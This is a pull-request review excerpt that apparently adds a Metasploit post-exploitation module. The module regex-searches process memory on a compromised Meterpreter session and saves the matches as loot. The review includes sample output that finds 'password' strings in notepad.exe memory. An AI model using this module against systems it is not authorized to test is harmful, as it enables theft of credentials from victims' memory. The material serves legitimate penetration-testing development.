modules/post/multi/gather/memory_search.rb

```diff
@@ -0,0 +1,231 @@
+        ::Msf::OptInt.new('MAX_MATCH_LEN', [true, 'The maximum number of bytes to match', 127]),
+        ::Msf::OptBool.new('REPLACE_NON_PRINTABLE_BYTES', [false, 'Replace non-printable bytes with "."', true]),
+        ::Msf::OptBool.new('SAVE_LOOT', [false, 'Save the memory matches to loot', true])
+      ]
+    )
+  end
+
+  def process_names_glob
+    datastore['PROCESS_NAMES_GLOB']
+  end
+
+  def process_ids
+    datastore['PROCESS_IDS']
+  end
+
+  def regex
+    datastore['REGEX']
+  end
+
+  def min_match_len
+    datastore['MIN_MATCH_LEN']
+  end
+
+  def max_match_len
+    datastore['MAX_MATCH_LEN']
+  end
+
+  def replace_non_printable_bytes?
+    datastore['REPLACE_NON_PRINTABLE_BYTES']
+  end
+
+  def save_loot?
+    datastore['SAVE_LOOT']
+  end
+
+  def get_target_processes
+    raw_target_pids = process_ids || ''
+    target_pids = raw_target_pids.split(',').map(&:to_i)
+    target_processes = []
+
+    session_processes = session.sys.process.get_processes
+    session_processes.each do |session_process|
+      pid, _ppid, name, _path, _session, _user, _arch = *session_process.values
+      if (::File.fnmatch(process_names_glob, name, ::File::FNM_EXTGLOB) unless process_names_glob.empty?) || (target_pids.include? pid)
+        target_processes.append session_process
+      end
+    end
+
+    target_processes
+  end
+
+  def run_against_multiple_processes(processes: [])
+    results = []
+
+    processes.each do |process|
+      response = nil
+      status = nil
+
+      begin
+        response = memory_search(process['pid'], regex, min_match_len, max_match_len)
+        status = :success
+      rescue ::Rex::Post::Meterpreter::RequestError => e
+        response = e
+        status = :failure
+      end
+
+      results.append({ process: process, status: status, response: response })
+    end
+
+    results
+  end
+
+  def memory_search(pid, needle, min_search_len, match_len)
+    request = ::Rex::Post::Meterpreter::Packet.create_request(::Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH)
+    request.add_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PID, pid)
+    request.add_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_NEEDLE, needle)
+    request.add_tlv(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, match_len)
+    request.add_tlv(::Rex::Post::Meterpreter::TLV_TYPE_UINT, min_search_len)
+    client.send_request(request)
+  end
+
+  def print_result(result: nil)
+    return unless result
+
+    process_info = "#{result[:process]['name']} (pid: #{result[:process]['pid']})"
+    unless result[:status] == :success
+      print_warning "Memory search request for #{process_info} failed. Reason: #{result[:response]}"
+      return
+    end
+
+    result_group_tlvs = result[:response].get_tlvs(::Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_MEMORY_SEARCH_RESULTS)
+    if result_group_tlvs.empty?
```

Comment:
Not a blocker; There's either a bug fix or UX improvements needed for trying to search 64 process memory from a 32 bit process

![image](https://github.com/rapid7/metasploit-framework/assets/60357436/cb119588-0724-44a1-adc7-4aeb4f9c0ef3)

After migrating to 64 bit process it works fine

```
[*] Running against the following processes:
	notepad.exe (pid: 4748)

[*] Memory Matches for notepad.exe (pid: 4748)
==========================================

 Match Address       Match Length  Match Buffer                                                                                             Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                             -------------------  ------------------
 0x00007FFF200AADE9  127           "password.......Printing........Print background colors and images......Play system sounds......Play so  0x00007FFF1FFB8000   0x00000000001E7000
                                   unds in web pages........"
 0x00007FFF200AC47B  127           "password.....Automatic logon only in Intranet zone...Arial...........AppleWebKit/537.36 (KHTML, like G  0x00007FFF1FFB8000   0x00000000001E7000
                                   ecko) Chrome/51.0.2704.79"

[+] Loot stored to: /Users/adfoster/.msf4/loot/20240123124227_default_192.168.123.147_memory.dmp_479367.bin
[+] Loot stored to: /Users/adfoster/.msf4/loot/20240123124227_default_192.168.123.147_memory.dmp_173286.bin
[*] Post module execution completed
```